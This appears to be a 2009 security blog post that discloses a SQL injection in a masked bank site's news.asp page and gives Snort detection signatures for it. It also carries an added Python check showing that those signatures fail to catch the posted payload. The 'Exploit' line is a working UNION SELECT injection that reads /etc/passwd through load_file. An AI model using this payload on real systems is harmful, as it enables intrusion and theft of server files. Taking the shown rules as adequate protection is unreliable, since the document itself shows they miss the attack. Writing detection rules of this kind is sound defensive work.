Sunday, January 4, 2009

SQL Injection for Bank

Credit for Exploit: Rohit Bansal

Exploit:
http://www.BankXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.com/news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7--

Vulnerable Variable: id=
Vulnerable File Frame: /news.asp?
SQL: UNION SELECT

Countermeasure:

Use the combination above (vulnerable variable, file and SQL keywords) to ensure that your Snort signature prevents the attack.

Example(s) in EmergingThreats format:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UNION SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id INSERT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+INSERT.+INTO/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id DELETE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+DELETE.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id ASCII"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+ASCII\(.+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UPDATE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UPDATE.+SET/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
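
Added example (not part of the original post or of the EmergingThreats rules): a coverage check that runs the pcre bodies of the six rules above against the request URI from the Exploit section, both raw and with '+' decoded to a space, since which form the sensor's URI normalization produces is an assumption here. BROAD_UNION and the function names are hypothetical; the masked host is left out.

```python
import re
from urllib.parse import unquote_plus

# Request URI from the Exploit section (host omitted; it is masked on the page).
EXPLOIT_URI = ("/news.asp?id=4+and+1=2+union+all+select+1,2,3,"
               "load_file(0x2f6574632f706173737764),5,6,7--")

# pcre bodies of the six rules above, keyed by the keyword in each msg.
PAGE_PCRES = {
    "SELECT": r".+SELECT.+FROM",
    "UNION SELECT": r".+UNION\s+SELECT",
    "INSERT": r".+INSERT.+INTO",
    "DELETE": r".+DELETE.+FROM",
    "ASCII": r".+ASCII\(.+SELECT",
    "UPDATE": r".+UPDATE.+SET",
}

# Assumed broader pattern (not from the page): tolerate '+', whitespace or
# /* */ comments as separators and an optional ALL/DISTINCT before SELECT.
SEP = r"(?:\s|\+|/\*.*?\*/)+"
BROAD_UNION = r"UNION" + SEP + r"(?:(?:ALL|DISTINCT)" + SEP + r")?SELECT"


def prefilter(uri):
    """Mimic the two uricontent/nocase checks shared by every rule."""
    low = uri.lower()
    return "/news.asp?" in low and "id=" in low


def fired(uri, patterns=PAGE_PCRES):
    """Names of the patterns that match uri (case-insensitive, like /i)."""
    if not prefilter(uri):
        return []
    return [name for name, rx in patterns.items() if re.search(rx, uri, re.I)]


def coverage(uri, patterns=PAGE_PCRES):
    """Check the URI as sent and with '+' decoded to a space."""
    forms = {"raw": uri, "decoded": unquote_plus(uri)}
    return {form: fired(value, patterns) for form, value in forms.items()}


if __name__ == "__main__":
    print("page rules :", coverage(EXPLOIT_URI))
    print("broad union:", coverage(EXPLOIT_URI, {"BROAD": BROAD_UNION}))
```

In both forms none of the six page patterns fire on the posted URI, because the payload puts ALL between UNION and SELECT and has no FROM clause; the broader pattern matches both forms.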

Disclosure: EvilFingers guarantees neither the exploit nor the signature.

Contact us at Contact.Fingers @ gmail.com for any further questions.

- EF
